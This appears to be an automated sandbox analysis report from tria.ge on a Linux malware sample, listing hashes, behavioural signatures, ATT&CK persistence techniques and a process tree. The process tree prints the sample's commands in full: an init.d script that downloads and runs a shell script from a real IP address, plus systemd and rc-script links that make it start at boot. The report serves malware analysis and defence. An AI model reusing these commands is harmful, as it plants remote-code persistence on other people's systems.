Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
2s -
max time network
179s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240611-en -
resource tags
-
submitted
22/11/2024, 12:08
General
-
Target
5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5
-
Size
90KB
-
MD5
563205e6c072588081ca841fc18d9f71
-
SHA1
1f7509a4c3456b8d29d504852648efface0e60cf
-
SHA256
5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5
-
SHA512
e55bbe2f62f898a1ee483fbed038de6d987c1cbac6688b3d12bf0a4f36a3d503abf474df82495d6b3e0c4ce60b01869bc497855879b6012c2cda9afba93b55f8
-
SSDEEP
1536:0loZZa3wD/CqhX9tLPGcMXNPsVzqbvGxHyAG/jZaZSibj7l3i2XE51SRhtQR/ad:0lEkwD/Cq9XOW+bvGy9csEjh3zUyh2ad
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Reads EFI boot settings 1 TTPs 1 IoCs
Reads EFI boot settings from the efivars filesystem, may contain security secrets or sensitive data.
-
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
-
Modifies init.d 2 TTPs 2 IoCs
Adds/modifies system service, likely for persistence.
-
Modifies rc script 2 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
-
Modifies Bash startup script 2 TTPs 1 IoCs
-
Changes its process name 1 IoCs
-
Reads runtime system information 9 IoCs
Reads data from /proc virtual filesystem.
Processes
-
/tmp/5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5/tmp/5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c51⤵
- Modifies Watchdog functionality
- Creates/modifies environment variables
- Modifies init.d
- Modifies rc script
- Modifies systemd
- Modifies Bash startup script
- Changes its process name
- Reads runtime system information
-
/bin/shsh -c "systemctl enable custom.service >/dev/null 2>&1"2⤵
-
/usr/bin/systemctlsystemctl enable custom.service3⤵
- Reads EFI boot settings
- Reads runtime system information
-
-
-
/bin/shsh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"2⤵
- File and Directory Permissions Modification
-
/usr/bin/chmodchmod +x /etc/init.d/mybinary3⤵
- File and Directory Permissions Modification
-
-
-
/bin/shsh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"2⤵
-
/usr/bin/lnln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary3⤵
-
-
-
/bin/shsh -c "echo \"#!/bin/sh # /etc/init.d/sh case \\\"\$1\\\" in start) echo 'Starting sh' /bin/sh & wget http://87.120.84.247/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/sh"2⤵
- File and Directory Permissions Modification
- Modifies init.d
-
-
/bin/shsh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"2⤵
- File and Directory Permissions Modification
-
/usr/bin/chmodchmod +x /etc/init.d/sh3⤵
- File and Directory Permissions Modification
-
-
-
/bin/shsh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"2⤵
-
/usr/bin/mkdirmkdir -p /etc/rc.d3⤵
- Reads runtime system information
-
-
-
/bin/shsh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"2⤵
-
/usr/bin/lnln -s /etc/init.d/sh /etc/rc.d/S99sh3⤵
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
4XDG Autostart Entries
1Boot or Logon Initialization Scripts
2RC Scripts
2Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Boot or Logon Autostart Execution
4XDG Autostart Entries
1Boot or Logon Initialization Scripts
2RC Scripts
2Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
110B
MD52a3758c7be4b51e45514ca71272a2241
SHA116f6c47091d87086ae361ee9653af0bbb3f0afb7
SHA25605e88586f84b6ddddd894580aa50f2b066be6520174c497e5957860e07f51ea7
SHA512246177d06d5c8d2444663c4d4828f3be8ca640123b6f0934add6953aa9b54e12e7114912644503fd598aa57dedd5a4392e14e136ce2c628899ed1f607a2b77ee
-
Filesize
97B
MD50680c195fdd2fca0a0e632cf637d150e
SHA17ded21dcbe33cfde13db634f159b7748b28b61c1
SHA2561d1be04cff45dde0d7a8a6e60e5c6e65312108a926d235892a04b0b2ce6cf38d
SHA512fad47bb194885f9e6b7875e99f4469807eb1aaac0fa7d04b647420bce466a1eb422320eafa59e180bdbd4c69414f671138fb60bdd87403a414f0624d678e497f
-
Filesize
354B
MD5064ba5f4b09e62ca552b70a2e94d6393
SHA17076e742aa5e9757e555091c4a72206018115518
SHA256038696b3a44f62a700ee8e6187eef48c8e817068900363d4e527b14899fc22a1
SHA5125488263037dd93ae9daa23e987a2c4016ad4f241d3d318abfbba4d19bf67fa7e1084bf09f03ab07580df49a3b8ac45767e6cbc03cf7e71afff5adb942ef42eb9
-
Filesize
102B
MD5e5e2c6d263b0ee1c9c19d46192ad5cdf
SHA13197ca0f3394eedd2c4702cb6eaf7a22817d5fef
SHA256436aed8a5a70ab60873b71384b840ddcb839185208bd3bddb2b6a627e053a548
SHA512bd5e7113e820c1771eeedac572c16201bcc490b820d5d18323f03dfa7e263e14f1bacbf5923a24daac0db1f9789ace29682307464e098f72820655537b6c2786
-
Filesize
53B
MD52bd9b4be30579e633fc0191aa93df486
SHA17d63a9bd9662e86666b27c1b50db8e7370c624ff
SHA25664dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d
SHA512ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5
-
Filesize
291B
MD5a31178fddb5564754ff49f0865dd2b20
SHA1f0b205696a09245229469d0ac1809135be57a837
SHA256d6f5a8734ff982cb1d46c25cad29fe1d09421ec31d364c507766a41cb775878d
SHA5127e2e400c9b70d54c7f4c196e8cf7970d4510577ab2777ab7694cb254445a68128256d10750e156681fdab7f35469f0efd9632ddc5432fb078ebf6f57da382a9d